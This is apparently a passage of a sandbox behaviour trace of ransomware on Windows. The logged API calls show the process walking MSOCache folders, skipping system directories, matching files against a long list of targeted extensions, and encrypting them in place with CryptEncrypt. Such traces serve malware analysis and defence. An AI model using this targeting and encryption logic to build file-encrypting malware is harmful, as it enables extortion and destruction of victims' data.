CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.150] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.151] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=4095519) returned 1 [0029.151] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e7e42, lpName=0x0) returned 0x230 [0029.151] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.151] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x3e0000, dwNumberOfBytesToMap=0x7e1f) returned 0xa0000 [0029.192] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.192] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e7e1f) returned 0x3240000 [0029.193] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x3e7e1f, dwBufLen=0x3e7e20 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x3e7e20) returned 1 [0029.325] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x3e7e20) returned 1 [0029.364] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0029.389] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.390] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x3e0000, dwNumberOfBytesToMap=0x7e42) returned 0xa0000 [0029.391] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.391] CryptHashData (hHash=0x368430, pbData=0xa7e1c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.391] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.391] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.391] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x7e42) returned 1 [0029.411] LocalFree (hMem=0x36ea40) returned 0x0 [0029.411] CryptDestroyHash (hHash=0x368430) returned 1 [0029.411] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.412] CloseHandle (hObject=0x230) returned 1 [0029.412] CloseHandle (hObject=0x22c) returned 1 [0029.412] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.412] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.412] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.412] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", pszFile="GrooveMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0029.412] PathFindExtensionW (pszPath="GrooveMUI.msi") returned=".msi" [0029.412] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0029.412] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.412] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.412] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", pszFile="GrooveMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" [0029.412] PathFindExtensionW (pszPath="GrooveMUI.xml") returned=".xml" [0029.412] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0029.412] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.413] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.413] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=913) returned 1 [0029.413] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c2, lpName=0x0) returned 0x230 [0029.413] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.413] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0xa0000 [0029.415] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.416] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0xa0000 [0029.417] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x391, dwBufLen=0x3a0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x3a0) returned 1 [0029.417] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x3a0) returned 1 [0029.418] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.419] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.419] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c2) returned 0xa0000 [0029.421] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.421] CryptHashData (hHash=0x368430, pbData=0xa039c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.421] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.421] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.421] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x3c2) returned 1 [0029.422] LocalFree (hMem=0x36ea40) returned 0x0 [0029.422] CryptDestroyHash (hHash=0x368430) returned 1 [0029.422] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.422] CloseHandle (hObject=0x230) returned 1 [0029.422] CloseHandle (hObject=0x22c) returned 1 [0029.422] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.422] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.422] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.422] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" [0029.422] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0029.422] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0029.422] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.422] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.423] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1452) returned 1 [0029.423] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d2, lpName=0x0) returned 0x230 [0029.423] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.423] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0xa0000 [0029.424] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.424] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0xa0000 [0029.425] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5ac, dwBufLen=0x5b0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5b0) returned 1 [0029.425] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5b0) returned 1 [0029.426] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.426] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.427] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d2) returned 0xa0000 [0029.427] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.427] CryptHashData (hHash=0x368430, pbData=0xa05ac, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.427] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.427] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.427] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5d2) returned 1 [0029.428] LocalFree (hMem=0x36ea40) returned 0x0 [0029.428] CryptDestroyHash (hHash=0x368430) returned 1 [0029.428] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.428] CloseHandle (hObject=0x230) returned 1 [0029.428] CloseHandle (hObject=0x22c) returned 1 [0029.428] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.428] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0029.428] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0029.428] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0029.429] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.429] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0115-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" [0029.429] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0029.429] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0029.429] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0029.429] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0029.429] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*" [0029.429] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0029.439] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.439] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.439] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.439] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.439] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.439] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="1033" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" [0029.439] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpSrch="\\Windows") returned 0x0 [0029.439] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpSrch="\\Program Files") returned 0x0 [0029.439] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpSrch="\\ProgramData") returned 0x0 [0029.439] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpSrch="\\AppData") returned 0x0 [0029.439] PathCombineW (in: pszDest=0x31cde58, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*" [0029.439] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0x3683b0 [0029.440] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.440] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0029.440] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.440] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0029.440] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.440] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", pszFile="dwintl20.dll" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0029.440] PathFindExtensionW (pszPath="dwintl20.dll") returned=".dll" [0029.440] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".dll.") returned 0x0 [0029.440] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0 [0029.440] FindClose (in: hFindFile=0x3683b0 | out: hFindFile=0x3683b0) returned 1 [0029.440] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.440] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.440] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="branding.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0029.440] PathFindExtensionW (pszPath="branding.xml") returned=".xml" [0029.440] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0029.441] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.441] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.441] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=596341) returned 1 [0029.441] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x919a2, lpName=0x0) returned 0x230 [0029.441] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.442] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x90000, dwNumberOfBytesToMap=0x1975) returned 0xa0000 [0029.456] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.456] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x2850000 [0029.457] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2850000*, pdwDataLen=0x31ce070*=0x91975, dwBufLen=0x91980 | out: pbData=0x2850000*, pdwDataLen=0x31ce070*=0x91980) returned 1 [0029.476] FlushViewOfFile (lpBaseAddress=0x2850000, dwNumberOfBytesToFlush=0x91980) returned 1 [0029.485] UnmapViewOfFile (lpBaseAddress=0x2850000) returned 1 [0029.489] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.489] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x90000, dwNumberOfBytesToMap=0x19a2) returned 0xa0000 [0029.490] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.490] CryptHashData (hHash=0x368430, pbData=0xa197c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.490] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.490] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.490] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x19a2) returned 1 [0029.490] LocalFree (hMem=0x36ea40) returned 0x0 [0029.490] CryptDestroyHash (hHash=0x368430) returned 1 [0029.490] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.491] CloseHandle (hObject=0x230) returned 1 [0029.491] CloseHandle (hObject=0x22c) returned 1 [0029.491] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.491] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.491] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.491] PathCombineW (in: 